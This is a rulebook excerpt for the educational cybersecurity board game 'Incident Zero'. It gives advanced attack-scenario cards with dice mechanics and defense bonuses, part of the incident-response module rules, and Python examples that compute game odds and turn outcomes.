Description: A pentester exploits a previously unknown vulnerability (zero-day) in a critical business application. Traditional defenses (patching, signature-based detection, vulnerability scanning) cannot help because the vulnerability isn't public. Only behavioral detection or proactive hunting can identify this attack. Can your advanced monitoring catch what signature-based tools cannot?

Attack Details:
  - Targets: Signature-based defenses, unknown vulnerability management
  - Attack Vector: Unpatched but pristine application
  - Success indicates: Blind spots in behavioral detection
  - Blue Team rolls 1d20 to detect before exploitation succeeds

Defending Defenses:
  - D-03 (Patching): +0 bonus (zero-day by definition isn't in patches)
  - D-06 (Antivirus): +0 bonus (signatures don't exist for zero-day)
  - D-08 (EDR): +3 bonus (behavioral analytics detect anomalous post-exploitation)
  - D-13 (Threat Hunting): +3 bonus (proactive hunting finds zero-day activity)
  - D-17 (Sandbox): +2 bonus (detonates malicious payloads in sandbox before deployment)
  - D-18 (IPS): +1 bonus only (cannot stop unknown exploits)
  - D-21 (Container Security): +2 bonus (isolates exploited application)

Outcome:
  - Blue Team Succeeds (15+): EDR or threat hunting detects post-exploitation activity before damage
  - Blue Team Fails: Zero-day achieves initial access; Blue Team suffers -1 penalty to all rolls for remainder of game (blind spot in defenses)

Special Rule: If Blue Team has NOT deployed at least 2 of {D-08, D-13, D-17}, they cannot succeed at this challenge (add clause: "You must have behavioral detection to stop unknown exploits").

Teaching Point: Signature-based defenses have inherent limitations. Behavioral detection and threat hunting are essential for detecting novel attacks. Zero-day preparedness requires assumption-of-breach mindset.


PT-11: Ransomware Deployment & Encryption

Tactic Type: Impact / Extortion
Target Vectors: MALWARE, DATA_EXFIL, NETWORK
Difficulty: EXPERT (defeat DC 15)

Description: A pentester deploys ransomware that encrypts critical business data and demands payment for decryption keys. The attack combines malware execution, persistence, and data exfiltration (to threaten public disclosure if ransom not paid). This is the culmination of a successful attack chain. Can your defenses prevent data encryption, and can your backup strategy save you?

Attack Details:
  - Targets: Data availability, backup resilience, recovery procedures
  - Success indicates: Lack of backup redundancy or immutable backup protection
  - Blue Team rolls 1d20 to either: (A) prevent ransomware deployment, OR (B) recover from backup

Defending Defenses:
  - Option A: Prevent Deployment
    - D-08 (EDR): +3 bonus (detects ransomware execution)
    - D-13 (Threat Hunting): +2 bonus (proactive hunting finds ransomware)
    - D-14 (Memory Forensics): +1 bonus (detects encryption process)
    - D-17 (Sandbox): +2 bonus (detonates before reaching production)
    - D-21 (Container Security): +2 bonus (prevents spread in containerized environments)

Outcome:
  - Blue Team Succeeds (15+ on prevention roll, or 12+ on recovery roll under Option B): Ransomware prevented or successfully recovered from backup
  - Blue Team Fails: Data encrypted; immediate loss of 25% of remaining Budget, and all data-dependent operations suffer -2 penalty for remainder of game

Special Rule - Immutable Backup Check: If Blue Team deployed D-19, they also need verification that backups are immutable and tested. If backup testing procedures weren't mentioned in D-19 deployment, the bonus only applies if they roll 15+.

Teaching Point: Ransomware is now the #1 cybersecurity threat. Prevention through detection is important, but backup resilience is the ultimate defense. Immutable backups that survive ransomware attacks are essential business continuity strategy. Regular restore testing is critical.


PT-12: APT Campaign - Multi-Turn Persistent Threat

Tactic Type: Advanced Persistent Threat / Long-term Compromise
Target Vectors: CREDENTIAL_ABUSE, MALWARE, NETWORK, DATA_EXFIL
Difficulty: EXPERT+ (defeat DC 16)

Description: A pentester simulates an Advanced Persistent Threat (APT) campaign that maintains presence across multiple turns. Each turn, the APT performs new reconnaissance, persistence, lateral movement, or data exfiltration activities. The Blue Team must detect and eradicate the APT before it achieves critical objectives. This is a multi-turn challenge that escalates difficulty.

Attack Details:
  - Multi-turn challenge (lasts 2-3 turns of main game)
  - Targets: Long-term detection, threat hunting, incident response procedures
  - Each turn the APT performs an action; Blue Team must detect and respond
  - If APT achieves 3 objectives (e.g., 3 successful data exfils), game is lost

Turn-by-Turn APT Actions:
  - Turn 1: Reconnaissance (scan network, enumerate users, identify critical assets)
  - Turn 2: Lateral movement (move to file server, domain controller)
  - Turn 3: Persistence establishment (add backdoor, create hidden user account)
  - Turn 4 (if still active): Data exfiltration (steal customer database)
  - Turn 5+ (if still active): Destruction phase (delete logs, trigger ransomware)

Defending Against APT:

Each turn, Blue Team must roll 1d20 to detect the APT activity:

Outcome:
  - Blue Team Succeeds (roll ≥ current DC, base 16): APT detected and eradicated before achieving 3 objectives
  - Blue Team Fails (roll < current DC): APT progresses to next action; if 3 objectives achieved, game is lost

Special Rule - Escalating Difficulty: Each turn the APT remains undetected, DC increases by 1 (Turn 1: DC 16, Turn 2: DC 17, Turn 3: DC 18, etc.)

Teaching Point: APTs are sophisticated, well-resourced, and patient. They expect to remain undetected for months or years. Early detection is critical. Continuous monitoring, threat intelligence integration, and advanced hunting are essential for APT detection.
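The multi-turn PT-12 procedure, with its escalating-difficulty rule, as an added example (not the game's own material): the DC starts at 16 and rises by 1 for every turn the APT has stayed undetected, the APT walks through the turn-by-turn action list, and the campaign ends either when one detection roll meets the current DC or when the APT has achieved 3 objectives. The card does not say exactly which undetected turns count as objectives, so this example assumes, and labels, that every undetected turn counts as one. Detection totals (d20 plus the Blue Team's modifiers) are passed in rather than rolled, so a table dispute can be replayed exactly.

```python
"""PT-12 APT Campaign, multi-turn resolution (added example, not the game's own code).

Rules taken from the card:
  - base DC 16; each turn the APT remains undetected the DC increases by 1
  - a detection roll >= current DC eradicates the APT
  - the campaign is lost once the APT has achieved 3 objectives
Assumption (not stated on the card): each undetected turn counts as one achieved objective.
"""
from typing import Dict, List, Tuple

# Turn-by-turn APT actions printed on the card; turn 5 and later repeat the last entry.
APT_ACTIONS = [
    "Reconnaissance",
    "Lateral movement",
    "Persistence establishment",
    "Data exfiltration",
    "Destruction phase",
]
BASE_DC = 16
OBJECTIVES_TO_LOSE = 3


def campaign_dc(turns_undetected: int) -> int:
    """Current DC after the given number of undetected turns (Turn 1: 16, Turn 2: 17, ...)."""
    return BASE_DC + turns_undetected


def apt_action_for_turn(turn: int) -> str:
    """Action the APT performs on this campaign turn (1-based); 'Turn 5+' repeats the destruction phase."""
    return APT_ACTIONS[min(turn, len(APT_ACTIONS)) - 1]


def run_apt_campaign(detection_totals: List[int]) -> Tuple[str, List[Dict]]:
    """Play the campaign turn by turn.

    detection_totals: the Blue Team's full detection total (d20 + modifiers) for each turn, in order.
    Returns (outcome, log) where outcome is 'eradicated', 'lost', or 'ongoing' (ran out of turns
    supplied without either ending), and log records DC, total and result for every turn played.
    """
    objectives = 0
    log: List[Dict] = []
    for turn, total in enumerate(detection_totals, start=1):
        dc = campaign_dc(turn - 1)  # one +1 per previous undetected turn
        detected = total >= dc
        log.append({"turn": turn, "action": apt_action_for_turn(turn),
                    "dc": dc, "total": total, "detected": detected})
        if detected:
            return "eradicated", log
        objectives += 1  # assumption: each undetected turn is one achieved objective
        if objectives >= OBJECTIVES_TO_LOSE:
            return "lost", log
    return "ongoing", log


if __name__ == "__main__":
    # Constructed totals for a three-turn campaign: 15 misses DC 16, 16 misses DC 17, 17 misses DC 18.
    outcome, log = run_apt_campaign([15, 16, 17])
    for entry in log:
        print(f"Turn {entry['turn']} ({entry['action']}): {entry['total']} vs DC {entry['dc']} -> "
              f"{'detected' if entry['detected'] else 'undetected'}")
    print("outcome:", outcome)
```

The constructed run shows the card's central lesson in numbers: a total that would have met the DC on turn 1 misses it two turns later, because every turn of dwell time raises the bar by one.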


PT-13: Cloud-Specific Attack - Misconfigured Cloud Resources

Tactic Type: Cloud Security / Privilege Escalation
Target Vectors: MALWARE, CREDENTIAL_ABUSE, NETWORK, DATA_EXFIL
Difficulty: ADVANCED (defeat DC 14)

Description: A pentester discovers misconfigured cloud resources (S3 bucket, Azure storage, GCP database) that are accessible without authentication. They pivot from a compromised workstation to cloud infrastructure, exfiltrating sensitive data stored in the cloud. Can your cloud security controls catch this lateral movement into the cloud?

Attack Details:
  - Targets: Cloud security posture management, identity & access management in cloud
  - Assumes: Blue Team has cloud infrastructure in their network design
  - Success indicates: Misconfigured cloud resources, weak cloud IAM policies
  - Blue Team rolls 1d20 to detect and remediate

Defending Defenses:
  - D-04 (Firewall Rules): +1 bonus (limits cloud connectivity from compromised systems)
  - D-20 (Zero Trust Access): +2 bonus (requires proper identity & authorization for cloud access)
  - D-21 (Container Security): +2 bonus (blocks cloud API abuse if containerized)
  - D-22 (SIEM Enterprise): +2 bonus (detects unusual cloud API calls)
  - D-24 (Threat Intelligence): +1 bonus (known misconfigured bucket signatures)
  - New Special Defense - Cloud Posture Mgmt: +3 bonus (automatically detects and remediates misconfigurations)

Special Cloud Defense: If Blue Team deployed cloud-specific hardening (e.g., cloud security posture management tools, cloud-native IAM), add +2 bonus.

Outcome:
  - Blue Team Succeeds (14+): Misconfiguration detected and remediated before exfiltration
  - Blue Team Fails: Cloud data is exfiltrated; -1 penalty to all rolls for remainder of game, plus immediate 15 Budget cost for cloud forensics

Teaching Point: Cloud security is fundamentally different from on-premises. Shared responsibility model requires organizations to actively manage cloud configuration. Cloud misconfigurations are the #1 cloud vulnerability. Continuous posture scanning is essential.


PT-14: IoT/OT Compromise - Industrial Network Attack

Tactic Type: Operational Technology Attack / Physical Safety Impact
Target Vectors: NETWORK, MALWARE
Difficulty: ADVANCED (defeat DC 14)

Description: A pentester compromises IoT or Operational Technology (OT) devices (industrial control systems, HVAC, building management, manufacturing systems) that are connected to the corporate network. Unlike IT systems (computers, servers), OT systems prioritize availability and cannot be patched frequently. Can your network architecture prevent OT compromise, and can you detect it before physical systems are affected?

Attack Details:
  - Targets: Network segmentation between IT and OT, OT-specific monitoring
  - Assumes: Blue Team has IoT/OT devices in their network design
  - Success indicates: Lack of network segmentation or OT-specific monitoring
  - Blue Team rolls 1d20 to detect and isolate

Defending Defenses:
  - D-04 (Firewall Rules): +1 bonus (separates IT from OT traffic)
  - D-09 (Network Segmentation): +3 bonus (dedicated OT segment with restricted access)
  - D-10 (SIEM Correlation): +1 bonus (detects OT anomalies if properly tuned)
  - D-22 (SIEM Enterprise): +2 bonus (advanced OT monitoring and correlation)
  - New Special Defense - OT Monitoring: +3 bonus (specialized tools detect OT compromise)

Special OT Defense: If Blue Team has deployed OT-specific monitoring and segmentation, add +2 bonus.

Outcome:
  - Blue Team Succeeds (14+): OT compromise detected and isolated before impact
  - Blue Team Fails: OT systems compromised; physical operations affected, -2 penalty to all rolls for remainder of game, plus potential safety/liability consequences (narrative impact)

Teaching Point: OT security is distinct from IT security. OT systems cannot be patched like IT systems. Network segmentation is the primary defense. OT-specific monitoring and threat hunting are essential. Organizations with manufacturing, utilities, or building management need specialized OT security strategies.


PT-15: Firmware/BIOS Attack - Bootloader Compromise

Tactic Type: Persistence / Hardware-Level Attack
Target Vectors: MALWARE, NETWORK
Difficulty: EXPERT (defeat DC 15)

Description: A pentester with physical or remote access targets system firmware (BIOS/UEFI) or bootloader, establishing persistence at the hardware level below the operating system. This attack survives OS reinstalls and even hardware replacement (if firmware is deployed via supply chain). Can your controls detect and prevent firmware-level attacks?

Attack Details:
  - Targets: Firmware integrity, secure boot verification, hardware attestation
  - Success indicates: Lack of UEFI Secure Boot, no firmware validation, no TPM
  - Blue Team rolls 1d20 to detect firmware tampering

Defending Defenses:
  - D-16 (Credential Guard & Secure Boot): +3 bonus (UEFI Secure Boot prevents unauthorized firmware)
  - D-17 (Malware Sandbox): +1 bonus only (doesn't catch firmware-level attacks)
  - D-13 (Threat Hunting): +2 bonus (advanced hunting detects firmware persistence)
  - New Special Defense - Hardware Attestation: +3 bonus (TPM verification detects firmware changes)
  - New Special Defense - Supply Chain Verification: +2 bonus (validates firmware integrity from trusted source)

Special Firmware Defense: If Blue Team deployed secure boot, TPM attestation, and hardware validation, add +2 additional bonus.

Outcome:
  - Blue Team Succeeds (15+): Firmware tampering detected and system reimaged
  - Blue Team Fails: Firmware-level persistence established; -2 penalty to all rolls for remainder of game, Blue Team loses control of compromised system

Teaching Point: Firmware attacks are extremely sophisticated but increasingly common in APT campaigns. Secure Boot and TPM are standard defenses but must be enabled and properly configured. Firmware supply chain security is critical. Organizations should consider firmware integrity verification in procurement.


PT-16: Privilege Escalation - Containerized Environment Escape

Tactic Type: Privilege Escalation / Container Escape
Target Vectors: MALWARE, NETWORK
Difficulty: EXPERT (defeat DC 15)

Description: A pentester, operating from within a compromised container, exploits a container runtime vulnerability (like CVE-2019-5736 runc exploit) to escape the container and gain access to the underlying host system. From there, lateral movement to other containers and host systems becomes possible. Can your container security and patching strategies prevent container escape?

Attack Details:
  - Targets: Container runtime patching, container isolation, runtime security
  - Assumes: Blue Team has containerized workloads (Docker, Kubernetes, etc.)
  - Success indicates: Unpatched container runtime or lack of runtime monitoring
  - Blue Team rolls 1d20 to prevent or detect escape

Defending Defenses:
  - D-03 (Patching): +2 bonus (ensures container runtime is patched)
  - D-08 (EDR): +2 bonus (detects suspicious syscalls attempting escape)
  - D-13 (Threat Hunting): +2 bonus (hunting for container escape indicators)
  - D-21 (Container Security): +4 bonus (runtime security detects and blocks escape attempts)
  - New Special Defense - Kubernetes Security Policies: +2 bonus (network policies and pod security policies restrict escape)

Special Container Defense: If Blue Team has deployed comprehensive container security (runtime monitoring + pod security policies + network policies), add +2 additional bonus.

Outcome:
  - Blue Team Succeeds (15+): Container escape prevented or detected before host compromise
  - Blue Team Fails: Attacker escapes container to host; immediate +1 for all subsequent attacks, gains ability to compromise other containers

Teaching Point: Container security is distinct from traditional OS security. Container runtimes have historically had significant vulnerabilities. Runtime security monitoring is essential. Kubernetes network policies and pod security standards are critical controls. Organizations using containers must keep runtimes patched and actively monitor for escape attempts.


Advanced Tactics Summary

| Card | Tactic | Vectors | Difficulty | Primary Defense |
|------|--------|---------|------------|-----------------|
| PT-09 | Multi-Vector Attack | Multiple | ADVANCED (DC 14) | Integrated Response |
| PT-10 | Zero-Day Exploitation | MALWARE, WEB | EXPERT (DC 15) | Behavioral Detection |
| PT-11 | Ransomware Deployment | MALWARE, EXFIL, NETWORK | EXPERT (DC 15) | Backup & DR |
| PT-12 | APT Campaign | Multiple | EXPERT+ (DC 16) | Threat Hunting |
| PT-13 | Cloud Misconfiguration | Multiple | ADVANCED (DC 14) | Cloud Posture |
| PT-14 | IoT/OT Compromise | NETWORK, MALWARE | ADVANCED (DC 14) | OT Segmentation |
| PT-15 | Firmware Attack | MALWARE, NETWORK | EXPERT (DC 15) | Hardware Attestation |
| PT-16 | Container Escape | MALWARE, NETWORK | EXPERT (DC 15) | Runtime Security |

Gameplay Recommendations

When to Use Advanced Tactics

  1. Experienced Teams: Players familiar with core tactics (PT-01 to PT-08)
  2. Longer Games: Extend Hardening gameplay to 9 turns instead of the standard 7 (v2.2)
  3. Specialized Environments: Organizations with cloud, IoT, or containerized infrastructure
  4. Challenge Play: Teams want more difficulty and realism

Suggested Advanced Scenarios

Scenario A: Cloud-Native Hardening (6 turns)
  - Turns 1-3: Deploy cloud-specific defenses + container security
  - Turn 4: PT-13 (Cloud Misconfiguration) challenge
  - Turn 5: PT-16 (Container Escape) challenge
  - Turn 6: Final defense evaluation

Scenario B: APT Defense (8 turns)
  - Turns 1-4: Deploy enterprise-grade defenses (SIEM, threat hunting, forensics)
  - Turns 5-7: PT-12 (APT Campaign) multi-turn challenge
  - Turn 8: Eradication and recovery

Scenario C: Zero-Day & Ransomware (7 turns)
  - Turns 1-3: Deploy behavioral detection + backup systems
  - Turn 4: PT-10 (Zero-Day) challenge
  - Turn 5: PT-11 (Ransomware) challenge
  - Turns 6-7: Recovery and hardening improvements


Design Philosophy

Each Advanced Tactic represents modern, sophisticated threat scenarios that:

  1. Are realistic - Based on actual APT campaigns, zero-day vulnerabilities, ransomware attacks
  2. Require advanced defenses - Cannot be defeated by basic controls alone
  3. Teach emerging threats - Cloud security, containerization, firmware, OT compromise
  4. Encourage specialization - Teams must choose focus areas (cloud, OT, containers) and accept vulnerability elsewhere
  5. Create strategic dilemmas - Limited budget forces difficult prioritization choices

Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Use distinct color scheme from core tactics (suggest: DARK RED background to indicate "advanced threat")
  3. Core tactics have lighter red; advanced tactics have darker red (visual difficulty progression)
  4. Cut along dotted lines
  5. Keep separate from core Pentester Tactic Cards until players are ready for advanced challenges

Special Rules for Advanced Tactics

Difficulty Escalation

Advanced tactics can be introduced gradually:
  - Start with PT-09 (Multi-Vector) and PT-10 (Zero-Day)
  - Once mastered, add PT-11 (Ransomware) and PT-13 (Cloud)
  - Save PT-12 (APT), PT-14 (OT), PT-15 (Firmware), PT-16 (Container) for expert play

Synergy with Core Tactics

Advanced tactics build on concepts from core tactics:
  - PT-09 (Multi-Vector) combines concepts from PT-01 to PT-08
  - PT-10 (Zero-Day) extends PT-05 (Priv Esc) concepts
  - PT-12 (APT) extends PT-02 (Malware Evasion) concepts

Future Expansion

Possible additional advanced tactics:
  - PT-17: Machine Learning Model Poisoning
  - PT-18: Quantum-Resistant Cryptography Breaking
  - PT-19: Supply Chain Compromise (Deep Dive)
  - PT-20: Geopolitical Nation-State Attack Simulation


Hardening Module: Advanced Pentester Tactics
Part of Incident Zero, a modular cybersecurity board game, v2.2 - Playtest Edition

docs/rules/module-incident-response.md

Incident Response Module: Rules & Mechanics

Version: 2.2 - Playtest Edition
Last Updated: July 2026


Module Overview

The Incident Response Module is the foundation of Incident Zero. Players act as a security operations center (SOC) team responding to an active cyberattack. The core challenge: reveal a hidden attack chain before time runs out or budget is exhausted.

This module teaches:
  - Primary: Cyber kill chain understanding, threat detection, evidence gathering
  - Secondary: Resource prioritization, incident response under pressure, forensic investigation

Key Mechanics:
  - Hidden attack chain (3-5 Threat Cards) is pre-built by the Threat Orchestrator
  - Blue Team reveals cards by successful investigation (two successes on the same chain link, v2.2) or by deploying a vector+step-matching defense
  - Uncontained Threats Penalty creates urgency—revealed threats cost 5 Budget per turn until contained
  - Active Breach Cost (v2.2)—while any chain card remains hidden, the breach itself costs 5 Budget per turn (dwell time is never free)
  - Emergency Response action provides a way to contain uncontained threats (15 Budget, v2.2)


Module Setup (5 minutes)

1. Choose Difficulty Level

Turn limits use the Variable Game Length formula from Core Rules §3a: Turn Limit = (Attack Chain Cards × 2) + 1.

| Difficulty | Chain Length | Starting Budget | Turn Limit | Best For |
|---|---|---|---|---|
| Beginner | 3 cards | 100 | 7 turns | First playthrough, basic learning |
| Intermediate | 4 cards | 100 | 9 turns | Standard play, mixed experience |
| Advanced | 5 cards | 100 | 11 turns | Experienced players, challenge |

Scaling Notes:
  - Beginner: ~30 min session, teaches full kill chain with comfortable pace
  - Intermediate: ~40 min session, requires focused investigation strategy
  - Advanced: ~45 min session, demands efficient resource allocation and quick thinking
  - Advanced Threat Orchestrators can instead use the Tier + d4 system in Core Rules §3a

2. Threat Orchestrator Preparation

Create the Hidden Attack Chain:
  1. Select 3-5 Threat Cards from the deck
  2. Arrange them in logical attack chain sequence:
     - First card: INITIAL COMPROMISE
     - Middle cards: PIVOT & ESCALATE, PERSISTENCE
     - Final card: C2 & EXFIL
  3. Write down clues for each hidden card on separate paper (keep hidden from Blue Team)
  4. Place relevant Asset Cards on the table (visible to all—provides scenario context). Asset Cards are shared components: see cards/network-building/core-deck/asset-cards.md

Attack Chain Strategy Tips:
  - Start simple (Beginner): Phishing → Lateral Movement → Database Exfil
  - Intermediate: Phishing → Credential Dumping → VPN Access → Persistence → C2 Beaconing
  - Advanced: Web Exploit → Lateral Movement → Privilege Escalation → Data Staging → Exfiltration

Recommended First-Time Scenario (3 cards, 30 minutes):
  1. T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING)
  2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK)
  3. T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL)

3. Blue Team Setup

Initialize trackers and materials:

| Item | Starting Value |
|---|---|
| Turn Tracker | 1 |
| Budget Tracker | 100 |
| Uncontained Threats Tracker | 0 |
| Defense Cards | Draw 5 (face down) |

4. Read the Opening Scenario

Threat Orchestrator delivers opening narrative using only the first hidden card's clue. Example:

"Your security operations center is monitoring the network when alerts begin firing. Your SIEM shows suspicious email traffic coming from your IT department domain, but the headers look spoofed. Several employees have reported clicking links in emails they thought came from IT requesting password resets.

You have limited time and budget to investigate before the attacker escalates. What do you do?"


Gameplay Loop (25-35 minutes)

Round Structure

Each turn represents approximately 2-4 hours of incident response operations.

COMPLETE TURN SEQUENCE:

1. START OF TURN
   - Apply Uncontained Threats Penalty: For each revealed-but-uncontained threat, deduct 5 Budget from the tracker
   - Apply Active Breach Cost (v2.2): If at least one chain card is still unrevealed, deduct 5 Budget (the hidden breach is doing damage while you can't see it)
   - Announce current turn number and budget remaining
   - Example: "Turn 3. Start-of-turn costs: 5 for your uncontained threat, plus 5 Active Breach Cost—the chain isn't fully mapped yet. Budget drops from 85 to 75."

2. BLUE TEAM'S TURN (2-3 minutes discussion)
   - Team discusses incident response strategy
   - Decides on ONE action to take this turn (Investigate, Deploy Defense, or Emergency Response)
   - Team member announces action and parameters (what they're investigating, which defense they're deploying, etc.)

3. ACTION RESOLUTION
   - Perform chosen action (see three actions below)
   - Roll 1d20 if action requires a roll
   - Apply modifiers (see modifier rules in core-rules.md)
   - Resolve outcome immediately

4. END OF TURN
   - Advance Turn Tracker by 1
   - Draw 1 new Defense Card (add to hand)
   - Check if game has been won or lost (see victory/defeat conditions below)
   - If still playing, return to START OF TURN

Sequential Discovery (v2.2 clarification)

The attack chain is discovered in order: only the earliest unrevealed chain card can be investigated toward or revealed. Clues, investigation successes, and Deploy Defense reveals all target that card until it is face-up, then attention shifts to the next link. This matches how the clue system walks the kill chain.

Deployed Defense Persistence (v2.2)

Deployed defenses stay on the table and keep working. Whenever the chain link currently being targeted has an Attack Vector matching a deployed defense's Countermeasure Vector, add +2 to Investigate and Deploy Defense rolls against that link. The Threat Orchestrator (who knows the hidden vector) announces when this bonus applies—hearing "your deployed defenses are helping here" is itself a useful clue. This rule is stated once here; other sections simply refer to it.


Three Incident Response Actions

Action 1: Investigate 🔎

Cost: 5 Budget per action
Roll Required: roll + modifiers ≥ 11 on d20
Special Rule: Modifiers apply and can stack

How It Works:

  1. Team describes what they're investigating (email headers, system logs, network traffic, memory dumps, etc.)
  2. Provide technical justification for your investigation approach
  3. Roll 1d20
  4. Compare: roll + modifiers ≥ 11?

Roll Modifiers:

| Bonus | When Awarded | Examples |
|---|---|---|
| +2 | Strong technical justification | "We're analyzing email headers in the mail gateway logs to identify the true sender IP and check it against threat intelligence feeds. This helps us understand the initial compromise vector." |
| +1 | Real security tools/techniques referenced | "We'll query our SIEM for scheduled task creation events" or "We're checking for Mimikatz usage in memory" |
| +2 | Deployed Defense Persistence (v2.2) | A deployed defense's vector matches the targeted chain link (see rule above) |
| +0 | Vague investigation | "We want to find suspicious activity" |

Success (roll + modifiers ≥ 11) — Investigation successes accumulate (v2.2):
  - First success against a chain link: TO provides a verbal clue about that card (the earliest unrevealed card in the chain)
  - Second success against the same chain link: THE CARD IS REVEALED! Place it face-up; it becomes uncontained (add 1 to the Uncontained Threats Tracker) and the team chooses a Discovery Reward
  - Clues should be dramatic and progressive—give more detail with each successful investigation
  - Budget is spent (5 is deducted)

Failure (roll + modifiers < 11):
  - "Your investigation yields no actionable intelligence at this time"
  - Budget is spent anyway (5 is deducted)
  - Team learns nothing but advances in time
  - Failure is realistic—not every investigation uncovers information
  - Failures do NOT count toward the two accumulated successes

Strategic Consideration:
  - Cheap action (only 5 Budget)
  - Moderate success chance (need 11+ on d20, so ~50% without bonuses)
  - Two successful investigations reveal a card without needing the right Defense Card in hand (v2.2)
  - Deploy Defense (full match) is faster—one successful roll—but costs more and needs the right card


Action 2: Deploy a Defense 🛡️

Cost: 10/15/25 Budget (depending on Defense Card tier: BASIC/ADVANCED/ELITE)
Roll Required: roll + modifiers ≥ 11 on d20
Special Rule: Modifiers apply; matching defense to threat reveals cards immediately

How It Works:

  1. Choose a Defense Card from your hand (any card in your hand is eligible)
  2. Target a specific Asset or threat vector (state what you're defending)
  3. Explain your strategy (optional but encouraged for +2 modifier): "Why is this defense appropriate for the current situation?"
  4. Roll 1d20
  5. Compare: roll + modifiers ≥ 11?

Roll Modifiers: Same as Investigate action (+2 for justification, +1 for tools, +2 Deployed Defense Persistence if applicable)

Success (roll + modifiers ≥ 11):

Check if the Defense Card matches the earliest unrevealed hidden threat (sequential discovery):
  - FULL MATCH: Defense Countermeasure Vector matches the threat's Attack Vector AND it's the correct step in the chain
  - THREAT CARD IS REVEALED IMMEDIATELY! Threat card is placed face-up on the table. Blue Team learns what they've been fighting.
  - Threat card is now "uncontained" (add 1 to Uncontained Threats Tracker)
  - Defense Card is discarded (used)
  - Budget is spent

Failure (roll + modifiers < 11):
  - Defense fails to deploy properly
  - Budget is spent anyway
  - Card is discarded
  - No progress made, but team learns from failure

Key Point: Even "unsuccessful" Defense deployments can be strategically valuable. Deployed defenses stay in play and grant +2 to rolls against later threats that match their vector (v2.2).

Strategic Consideration:
  - Expensive action (10-25 Budget, scales with defense tier)
  - Moderate success chance (same 11+ threshold as Investigate)
  - Two potential rewards: Defense deployment AND card reveal
  - High-risk/high-reward compared to Investigate

Example Scenario:

Hidden attack chain: Phishing → Lateral Movement → Database Exfil

Team believes phishing is happening (first card).
They deploy D-01 "Email Authentication Setup" (BASIC, 10 Budget).
Email Authentication addresses SOCIAL ENGINEERING vector.

Roll: 8 + 2 (strong justification) = 10 = FAIL
Email deployment fails, 10 Budget spent, card discarded.

Next turn: Same team deploys D-02 "User Security Training" (BASIC, 10 Budget).
Roll: 13 + 1 = 14 = SUCCESS
Defense addresses SOCIAL ENGINEERING vector and is INITIAL COMPROMISE step.
PHISHING CAMPAIGN REVEALED! Threat card placed face-up.
Uncontained Threats increases to 1 (now costing 5 Budget per turn).
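The trade-off stated under Strategic Consideration (Investigate is cheap but needs two successes on a link; a full-match Deploy is one roll but costs more and needs the right card) can be put in numbers. The following is an added example, not part of the Incident Zero materials: it works out the exact d20 odds for each modifier total, the expected Budget to reveal one link by either action, and the probability of revealing a link within a given number of turns. Because every attempt burns a turn, and every turn start costs the Active Breach Cost while a card is hidden, a per-turn overhead is folded into the comparison; that overhead parameter and the assumption that the team already holds a full-match Defense Card for the Deploy column are this example's own simplifications.

```python
"""Expected cost of revealing one chain link: Investigate vs. Deploy Defense.

Added example, not part of the Incident Zero materials. Rules encoded:
an action succeeds when d20 + modifiers >= 11; an Investigate reveal needs
two successes on the same link (v2.2); a full-match Deploy needs one.
"""
from fractions import Fraction
from math import comb

D20 = 20
TARGET = 11
INVESTIGATE_COST = 5
DEPLOY_COST = {"BASIC": 10, "ADVANCED": 15, "ELITE": 25}
ACTIVE_BREACH_COST = 5   # paid at the start of every turn while a card is hidden


def success_probability(modifier: int) -> Fraction:
    """P(d20 + modifier >= TARGET). Modifiers (+2 justification, +1 tools,
    +2 Deployed Defense Persistence) stack, so pass their total."""
    lowest_winning_face = TARGET - modifier
    faces = min(D20, max(0, D20 - lowest_winning_face + 1))
    return Fraction(faces, D20)


def expected_cost_to_reveal(action_cost: int, successes_needed: int, modifier: int,
                            turn_overhead: int = ACTIVE_BREACH_COST) -> Fraction:
    """Expected Budget to reveal one link. Each attempt costs the action plus the
    start-of-turn overhead it burns; k successes take k/p attempts on average
    (simplification assumed by this example: one attempt per turn, fixed overhead)."""
    p = success_probability(modifier)
    if p == 0:
        raise ValueError("no chance of success with this modifier")
    return Fraction(successes_needed) / p * (action_cost + turn_overhead)


def p_reveal_within(turns: int, successes_needed: int, modifier: int) -> Fraction:
    """P(at least `successes_needed` successes in `turns` attempts): binomial tail."""
    p = success_probability(modifier)
    return sum(comb(turns, k) * p ** k * (1 - p) ** (turns - k)
               for k in range(successes_needed, turns + 1))


def compare(modifier: int, turn_overhead: int = ACTIVE_BREACH_COST) -> dict:
    """Expected Budget per revealed link for Investigate and each Deploy tier."""
    out = {"investigate": expected_cost_to_reveal(INVESTIGATE_COST, 2, modifier, turn_overhead)}
    for tier, cost in DEPLOY_COST.items():
        out["deploy_" + tier] = expected_cost_to_reveal(cost, 1, modifier, turn_overhead)
    return out


if __name__ == "__main__":
    for mod in (0, 2, 3, 5):
        row = {k: round(float(v), 1) for k, v in compare(mod).items()}
        print(f"+{mod}: p={float(success_probability(mod)):.2f} {row}")
    print("P(link revealed within 3 turns) investigate:",
          float(p_reveal_within(3, 2, 0)), "deploy:", float(p_reveal_within(3, 1, 0)))
```

With no modifiers, a BASIC full-match Deploy reveals a link for about 30 expected Budget against 40 for two Investigates, and has a 7-in-8 chance of doing so within three turns against 1-in-2 for Investigate; ADVANCED and ELITE cards cost more per reveal than investigating, and Investigate needs no specific card and yields a clue on its first success, which this model does not price. Threat Orchestrators can rerun the comparison with the +2 Deployed Defense Persistence bonus or a higher overhead (an uncontained threat on the table adds 5 per turn) when judging whether a scenario is too easy or too hard.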

Action 3: Emergency Response 🚨

Cost: 15 Budget (v2.2 — repriced from 25; flat cost)
Roll Required: None—this always succeeds
Special Rule: Only works on previously revealed threats

How It Works:

  1. Choose a revealed Threat Card still in play (face-up on table)
  2. Describe your containment strategy in detail:
     - Quarantine infected systems
     - Disable compromised accounts
     - Isolate network segments
     - Kill active processes
     - Revoke stolen credentials
     - etc.
  3. Pay the 15 Budget cost
  4. Card is immediately removed from play
  5. Uncontained Threats Tracker decreases by 1 (penalty stops for this threat)

Strategic Use Cases:

Example Timeline (one action per turn):

Turn 3: Deploy Defense succeeds → PHISHING revealed → Uncontained Threats = 1
Turn 4: START → Deduct 5 (uncontained) + 5 (Active Breach Cost, 2 cards still hidden)
        ACTION → Emergency Response on Phishing: pay 15 Budget
        → Phishing removed from play, Uncontained Threats = 0
Turn 5: START → Deduct only 5 (Active Breach Cost; no uncontained threats)

Uncontained Threats & Active Breach Cost

These are the core urgency mechanics of Incident Response. Dwell time costs money—whether you can see the threat or not.

